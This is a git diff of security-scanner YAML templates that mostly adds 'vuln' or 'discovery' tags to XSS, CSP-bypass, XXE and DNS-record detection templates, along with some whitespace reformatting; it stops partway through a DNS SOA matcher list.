xss,csp-bypass,unpkg-hyperscript + tags: xss,csp-bypass,unpkg-hyperscript,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/usersnap-widget-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/usersnap-widget-csp-bypass.yaml index 6db7d6fbce6..4f17b271dd0 100644 --- a/dast/vulnerabilities/xss/csp-bypass/usersnap-widget-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/usersnap-widget-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,usersnap-widget + tags: xss,csp-bypass,usersnap-widget,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/vercel-storage-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/vercel-storage-csp-bypass.yaml index f0180c75d7f..4eb612e8c3c 100644 --- a/dast/vulnerabilities/xss/csp-bypass/vercel-storage-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/vercel-storage-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,vercel-storage + tags: xss,csp-bypass,vercel-storage,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/vimeo-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/vimeo-csp-bypass.yaml index ee4e50546c7..ed44ea4c650 100644 --- a/dast/vulnerabilities/xss/csp-bypass/vimeo-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/vimeo-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,vimeo + tags: xss,csp-bypass,vimeo,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/virtualearth-dev-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/virtualearth-dev-csp-bypass.yaml index 9d1f4f2ddc6..1744c39ad3b 100644 --- a/dast/vulnerabilities/xss/csp-bypass/virtualearth-dev-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/virtualearth-dev-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,virtualearth-dev + tags: xss,csp-bypass,virtualearth-dev,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/vk-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/vk-api-csp-bypass.yaml index 8074bd09221..c2340a6a777 100644 --- a/dast/vulnerabilities/xss/csp-bypass/vk-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/vk-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,vk-api + tags: xss,csp-bypass,vk-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/wikipedia-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/wikipedia-api-csp-bypass.yaml index a9974e72ad5..f4014ef6e8d 100644 --- a/dast/vulnerabilities/xss/csp-bypass/wikipedia-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/wikipedia-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,wikipedia-api + tags: xss,csp-bypass,wikipedia-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/wistia-fast-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/wistia-fast-csp-bypass.yaml index 90175899d70..13fbc4df0d4 100644 --- a/dast/vulnerabilities/xss/csp-bypass/wistia-fast-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/wistia-fast-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,wistia-fast + tags: xss,csp-bypass,wistia-fast,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/wordpress-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/wordpress-api-csp-bypass.yaml index 59d8b19c065..0f3c2927b3e 100644 --- a/dast/vulnerabilities/xss/csp-bypass/wordpress-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/wordpress-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,wordpress-api + tags: xss,csp-bypass,wordpress-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/wordpress-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/wordpress-csp-bypass.yaml index bcfb7a34f91..735d86437d7 100644 --- a/dast/vulnerabilities/xss/csp-bypass/wordpress-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/wordpress-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,wordpress + tags: xss,csp-bypass,wordpress,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/wordpress-public-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/wordpress-public-api-csp-bypass.yaml index 13c2dbc3618..4e10f86dcb4 100644 --- a/dast/vulnerabilities/xss/csp-bypass/wordpress-public-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/wordpress-public-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,wordpress-public-api + tags: xss,csp-bypass,wordpress-public-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/x-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/x-api-csp-bypass.yaml index 7419da16486..61750a39828 100644 --- a/dast/vulnerabilities/xss/csp-bypass/x-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/x-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,x-api + tags: xss,csp-bypass,x-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/yahoo-search-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/yahoo-search-csp-bypass.yaml index 015d2133146..58ed85c6514 100644 --- a/dast/vulnerabilities/xss/csp-bypass/yahoo-search-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/yahoo-search-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,yahoo-search + tags: xss,csp-bypass,yahoo-search,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/yandex-mc-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/yandex-mc-csp-bypass.yaml index d80bd3cb003..7e5ea4f0d23 100644 --- a/dast/vulnerabilities/xss/csp-bypass/yandex-mc-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/yandex-mc-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,yandex-mc + tags: xss,csp-bypass,yandex-mc,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/yandex-social-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/yandex-social-csp-bypass.yaml index 37c73b9ed8e..f15da4d7fe2 100644 --- a/dast/vulnerabilities/xss/csp-bypass/yandex-social-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/yandex-social-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,yandex-social + tags: xss,csp-bypass,yandex-social,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/yandex-st-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/yandex-st-csp-bypass.yaml index 90d199ecd8f..7634fdc09da 100644 --- a/dast/vulnerabilities/xss/csp-bypass/yandex-st-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/yandex-st-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,yandex-st + tags: xss,csp-bypass,yandex-st,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/yandex-translate-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/yandex-translate-csp-bypass.yaml index d91405d5fec..e660538c172 100644 --- a/dast/vulnerabilities/xss/csp-bypass/yandex-translate-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/yandex-translate-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,yandex-translate + tags: xss,csp-bypass,yandex-translate,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/yandexcloud-smartcaptcha-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/yandexcloud-smartcaptcha-csp-bypass.yaml index 54e0951aa98..20a645dad85 100644 --- a/dast/vulnerabilities/xss/csp-bypass/yandexcloud-smartcaptcha-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/yandexcloud-smartcaptcha-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,yandexcloud-smartcaptcha + tags: xss,csp-bypass,yandexcloud-smartcaptcha,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/yastat-angular-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/yastat-angular-csp-bypass.yaml index 67c5517b611..845b9403b08 100644 --- a/dast/vulnerabilities/xss/csp-bypass/yastat-angular-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/yastat-angular-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,yastat-angular + tags: xss,csp-bypass,yastat-angular,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/yastatic-angular-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/yastatic-angular-csp-bypass.yaml index b646638c755..b7987818df3 100644 --- a/dast/vulnerabilities/xss/csp-bypass/yastatic-angular-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/yastatic-angular-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,yastatic-angular + tags: xss,csp-bypass,yastatic-angular,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/youku-acs-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/youku-acs-csp-bypass.yaml index acdaea53a22..f99bd7df0c3 100644 --- a/dast/vulnerabilities/xss/csp-bypass/youku-acs-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/youku-acs-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,youku-acs + tags: xss,csp-bypass,youku-acs,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/youtube-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/youtube-api-csp-bypass.yaml index e01dba74ce0..61d0b4d1011 100644 --- a/dast/vulnerabilities/xss/csp-bypass/youtube-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/youtube-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,youtube-api + tags: xss,csp-bypass,youtube-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/youtube-suggestqueries-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/youtube-suggestqueries-csp-bypass.yaml index d68cead2119..14849cef03c 100644 --- a/dast/vulnerabilities/xss/csp-bypass/youtube-suggestqueries-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/youtube-suggestqueries-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,youtube-suggestqueries + tags: xss,csp-bypass,youtube-suggestqueries,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/ytimg-s-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/ytimg-s-csp-bypass.yaml index 4b773293514..a2b761f6507 100644 --- a/dast/vulnerabilities/xss/csp-bypass/ytimg-s-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/ytimg-s-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,ytimg-s + tags: xss,csp-bypass,ytimg-s,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/yuedust-angular-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/yuedust-angular-csp-bypass.yaml index 4d68226b1c3..0f3c1642835 100644 --- a/dast/vulnerabilities/xss/csp-bypass/yuedust-angular-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/yuedust-angular-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,yuedust-angular + tags: xss,csp-bypass,yuedust-angular,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/yugiohmonstrosdeduelo-blogger-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/yugiohmonstrosdeduelo-blogger-csp-bypass.yaml index 7254e00f5aa..42987c4020b 100644 --- a/dast/vulnerabilities/xss/csp-bypass/yugiohmonstrosdeduelo-blogger-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/yugiohmonstrosdeduelo-blogger-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,yugiohmonstrosdeduelo-blogger + tags: xss,csp-bypass,yugiohmonstrosdeduelo-blogger,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/zendesk-support-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/zendesk-support-csp-bypass.yaml index 113f54846ae..b18ed7c7227 100644 --- a/dast/vulnerabilities/xss/csp-bypass/zendesk-support-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/zendesk-support-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,zendesk-support + tags: xss,csp-bypass,zendesk-support,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/zendesk-thiscanbeanything-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/zendesk-thiscanbeanything-csp-bypass.yaml index 25b5259a87e..2cd4e447dd2 100644 --- a/dast/vulnerabilities/xss/csp-bypass/zendesk-thiscanbeanything-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/zendesk-thiscanbeanything-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,zendesk-thiscanbeanything + tags: xss,csp-bypass,zendesk-thiscanbeanything,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/zhike-help-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/zhike-help-csp-bypass.yaml index b3bfb0ab37e..ed9004c1418 100644 --- a/dast/vulnerabilities/xss/csp-bypass/zhike-help-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/zhike-help-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,zhike-help + tags: xss,csp-bypass,zhike-help,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/zoom-st3-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/zoom-st3-csp-bypass.yaml index 81af9955381..787d62742e5 100644 --- a/dast/vulnerabilities/xss/csp-bypass/zoom-st3-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/zoom-st3-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,zoom-st3 + tags: xss,csp-bypass,zoom-st3,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/dom-xss.yaml b/dast/vulnerabilities/xss/dom-xss.yaml index 5eee587abcf..07759ebf66d 100644 --- a/dast/vulnerabilities/xss/dom-xss.yaml +++ b/dast/vulnerabilities/xss/dom-xss.yaml @@ -10,7 +10,7 @@ info: Allows attackers to execute malicious scripts in the victim's browser. remediation: | Sanitize and validate user input to prevent script injection. - tags: xss,dom,dast,headless + tags: xss,dom,dast,headless,vuln variables: num: "{{rand_int(10000, 99999)}}" diff --git a/dast/vulnerabilities/xss/reflected-xss.yaml b/dast/vulnerabilities/xss/reflected-xss.yaml index 027697880f8..f709cc49b45 100644 --- a/dast/vulnerabilities/xss/reflected-xss.yaml +++ b/dast/vulnerabilities/xss/reflected-xss.yaml @@ -6,7 +6,7 @@ info: severity: medium metadata: max-request: 1 - tags: xss,rxss,dast + tags: xss,rxss,dast,vuln variables: first: "{{rand_int(10000, 99999)}}" diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml index 95bf781e623..779c7d1b64a 100644 --- a/dast/vulnerabilities/xxe/generic-xxe.yaml +++ b/dast/vulnerabilities/xxe/generic-xxe.yaml @@ -8,7 +8,7 @@ info: - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py metadata: max-request: 2 - tags: dast,xxe + tags: dast,xxe,vuln variables: rletter: "{{rand_base(6,'abc')}}" diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index 5bcb06fb979..a6b728dd41e 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-404 metadata: max-request: 1 - tags: dns,takeover,azure + tags: dns,takeover,azure,discovery dns: - name: "{{FQDN}}" diff --git a/dns/bimi-detect.yaml b/dns/bimi-detect.yaml index 3e8b8c5bad7..091651ca496 100644 --- a/dns/bimi-detect.yaml +++ b/dns/bimi-detect.yaml @@ -1,5 +1,5 @@ -id: bimi-record-detect - +id: bimi-record-detect + info: name: BIMI Record - Detection author: rxerium @@ -10,17 +10,17 @@ info: - https://postmarkapp.com/blog/what-the-heck-is-bimi metadata: max-request: 1 - tags: dns,bimi -dns: - - name: "{{FQDN}}" - type: TXT - matchers: - - type: word - words: - - "v=BIMI1" - - extractors: - - type: regex - regex: + tags: dns,bimi,discovery +dns: + - name: "{{FQDN}}" + type: TXT + matchers: + - type: word + words: + - "v=BIMI1" + + extractors: + - type: regex + regex: - "v=BIMI1(.+)" # digest: 4a0a0047304502210096aefa221510a2b6425971e404c57649376644a783d50bebecc1841ed10731d502207ae72fc62e19cb0d5db753abc4a8d9954979168b89a5c25d53462423b9b39477:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dns/caa-fingerprint.yaml b/dns/caa-fingerprint.yaml index 72b1c9074c2..feced2a74eb 100644 --- a/dns/caa-fingerprint.yaml +++ b/dns/caa-fingerprint.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,caa + tags: dns,caa,discovery dns: - name: "{{FQDN}}" diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml index dcf52a5d4c1..a6d95dfb2e9 100644 --- a/dns/detect-dangling-cname.yaml +++ b/dns/detect-dangling-cname.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,takeover + tags: dns,takeover,discovery dns: - name: "{{FQDN}}" diff --git a/dns/dmarc-detect.yaml b/dns/dmarc-detect.yaml index ca086740f35..5c43af73d74 100644 --- a/dns/dmarc-detect.yaml +++ b/dns/dmarc-detect.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,dmarc + tags: dns,dmarc,discovery dns: - name: "_dmarc.{{FQDN}}" diff --git a/dns/dns-rebinding.yaml b/dns/dns-rebinding.yaml index 95b341ed145..f9710db4e85 100644 --- a/dns/dns-rebinding.yaml +++ b/dns/dns-rebinding.yaml @@ -11,7 +11,7 @@ info: - https://heimdalsecurity.com/blog/dns-rebinding/ metadata: max-request: 2 - tags: redirect,dns,network + tags: redirect,dns,network,discovery dns: - name: "{{FQDN}}" diff --git a/dns/dns-saas-service-detection.yaml b/dns/dns-saas-service-detection.yaml index 7d500255a08..55542e7c698 100644 --- a/dns/dns-saas-service-detection.yaml +++ b/dns/dns-saas-service-detection.yaml @@ -11,7 +11,7 @@ info: - https://www.ionos.com/digitalguide/hosting/technical-matters/cname-record/ metadata: max-request: 1 - tags: dns,service + tags: dns,service,discovery dns: - name: "{{FQDN}}" diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml index a714e12081d..25ed76462ed 100644 --- a/dns/dns-waf-detect.yaml +++ b/dns/dns-waf-detect.yaml @@ -9,7 +9,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: tech,waf,dns + tags: tech,waf,dns,discovery dns: - name: "{{FQDN}}" diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml index 96361208ff4..b20190becac 100644 --- a/dns/dnssec-detection.yaml +++ b/dns/dnssec-detection.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,dnssec + tags: dns,dnssec,discovery dns: - name: "{{FQDN}}" diff --git a/dns/ec2-detection.yaml b/dns/ec2-detection.yaml index 9d95d8a3dfa..cec5d9f1baa 100644 --- a/dns/ec2-detection.yaml +++ b/dns/ec2-detection.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,ec2,aws + tags: dns,ec2,aws,discovery dns: - name: "{{FQDN}}" diff --git a/dns/elasticbeanstalk-takeover.yaml b/dns/elasticbeanstalk-takeover.yaml index 54cfc4a5f42..fd3dd4633c5 100644 --- a/dns/elasticbeanstalk-takeover.yaml +++ b/dns/elasticbeanstalk-takeover.yaml @@ -24,7 +24,7 @@ info: For example: CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c - tags: dns,takeover,aws,elasticbeanstalk + tags: dns,takeover,aws,elasticbeanstalk,discovery dns: - name: "{{FQDN}}" diff --git a/dns/fbi-seized-nameserver.yaml b/dns/fbi-seized-nameserver.yaml index fe3b3b30439..fd4c5161964 100644 --- a/dns/fbi-seized-nameserver.yaml +++ b/dns/fbi-seized-nameserver.yaml @@ -1,38 +1,38 @@ -id: fbi-seized-nameserver - -info: - name: FBI Seized Nameserver - Detect - author: rxerium - severity: info - description: | - Detected domains whose nameservers have been seized by law enforcement (e.g., FBI), often indicating involvement in malicious or criminal activity. - classification: - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: title:"THIS WEBSITE HAS BEEN SEIZED" - fofa-query: title="THIS WEBSITE HAS BEEN SEIZED" - tags: dns,ns,darkweb,fbi,seized - -dns: - - name: "{{FQDN}}" - type: NS - - matchers: - - type: word - words: - - "ns1.fbi.seized.gov" - - "ns2.fbi.seized.gov" - - "ns3.fbi.seized.gov" - - "jocelyn.ns.cloudflare.com" - - "plato.ns.cloudflare.com" - - "ns1.usssdomainseizure.com" - - "ns2.usssdomainseizure.com" - condition: or - - extractors: - - type: regex - group: 1 - regex: +id: fbi-seized-nameserver + +info: + name: FBI Seized Nameserver - Detect + author: rxerium + severity: info + description: | + Detected domains whose nameservers have been seized by law enforcement (e.g., FBI), often indicating involvement in malicious or criminal activity. + classification: + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: title:"THIS WEBSITE HAS BEEN SEIZED" + fofa-query: title="THIS WEBSITE HAS BEEN SEIZED" + tags: dns,ns,darkweb,fbi,seized,discovery + +dns: + - name: "{{FQDN}}" + type: NS + + matchers: + - type: word + words: + - "ns1.fbi.seized.gov" + - "ns2.fbi.seized.gov" + - "ns3.fbi.seized.gov" + - "jocelyn.ns.cloudflare.com" + - "plato.ns.cloudflare.com" + - "ns1.usssdomainseizure.com" + - "ns2.usssdomainseizure.com" + condition: or + + extractors: + - type: regex + group: 1 + regex: - "IN\\tNS\\t(.+)" # digest: 4a0a00473045022100ad658191a74624e675c655a73e9fb90d9a036b560e65501a81456ed5bf04d799022036d027a3262b35885e98b578a4e236e06a716fbc1d9161056c7e0caab24ae562:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dns/mx-fingerprint.yaml b/dns/mx-fingerprint.yaml index 3084fd54912..9b46280d31f 100644 --- a/dns/mx-fingerprint.yaml +++ b/dns/mx-fingerprint.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,mx + tags: dns,mx,discovery dns: - name: "{{FQDN}}" diff --git a/dns/mx-service-detector.yaml b/dns/mx-service-detector.yaml index 4d75898b5a5..64c689cae4a 100644 --- a/dns/mx-service-detector.yaml +++ b/dns/mx-service-detector.yaml @@ -9,7 +9,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,service + tags: dns,service,discovery dns: - name: "{{FQDN}}" diff --git a/dns/nameserver-fingerprint.yaml b/dns/nameserver-fingerprint.yaml index 493eb15a801..c43890a5b74 100644 --- a/dns/nameserver-fingerprint.yaml +++ b/dns/nameserver-fingerprint.yaml @@ -9,7 +9,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,ns + tags: dns,ns,discovery dns: - name: "{{FQDN}}" diff --git a/dns/ptr-fingerprint.yaml b/dns/ptr-fingerprint.yaml index 0eca07d9b5f..0774a0fee3f 100644 --- a/dns/ptr-fingerprint.yaml +++ b/dns/ptr-fingerprint.yaml @@ -9,7 +9,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,ptr + tags: dns,ptr,discovery dns: - name: "{{FQDN}}" diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml index a34d3ca2be3..96772c5023a 100644 --- a/dns/servfail-refused-hosts.yaml +++ b/dns/servfail-refused-hosts.yaml @@ -9,7 +9,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: dns,takeover + tags: dns,takeover,discovery dns: - name: "{{FQDN}}" diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml index a126d06f277..769d4df7d8c 100644 --- a/dns/soa-detect.yaml +++ b/dns/soa-detect.yaml @@ -1,5 +1,5 @@ -id: soa-detect - +id: soa-detect + info: name: SOA Record Service - Detection author: rxerium @@ -11,74 +11,74 @@ info: metadata: verified: true max-request: 1 - tags: dns,soa + tags: dns,soa,discovery -dns: - - name: "{{FQDN}}" - - type: SOA - - matchers-condition: or - matchers: - - type: word - name: "cloudflare" - words: - - "dns.cloudflare.com" - - - type: word - name: "amazon-web-services" - words: - - "awsdns" - - - type: word - name: "akamai" - words: - - "hostmaster.akamai.com" - - - type: word - name: "azure" - words: - - "azure-dns.com" - - - type: word - name: "ns1" - words: - - "nsone.net" - - - type: word - name: "verizon" - words: - - "verizon.com" - - - type: word - name: "google-cloud-platform" - words: - - "googledomains.com" - - "google.com" - - - type: word - name: "alibaba" - words: - - "alibabadns.com" - - - type: word - name: "safeway" - words: - - "safeway.com" - - - type: word - name: "mark-monitor" - words: - - "markmonitor.com" - - "markmonitor.zone" - - - type: word - name: "hetznet" - words: - - "hetzner.com" - - - type: word - name: "edge-cast" - words: +dns: + - name: "{{FQDN}}" + + type: SOA + + matchers-condition: or + matchers: + - type: word + name: "cloudflare" + words: + - "dns.cloudflare.com" + + - type: word + name: "amazon-web-services" + words: + - "awsdns" + + - type: word + name: "akamai" + words: + - "hostmaster.akamai.com" + + - type: word + name: "azure" + words: + - "azure-dns.com" + + - type: word + name: "ns1" + words: + - "nsone.net" + + - type: word + name: "verizon" + words: + - "verizon.com" + + - type: word + name: "google-cloud-platform" + words: + - "googledomains.com" + - "google.com" + + - type: word + name: "alibaba" + words: + - "alibabadns.com" + + - 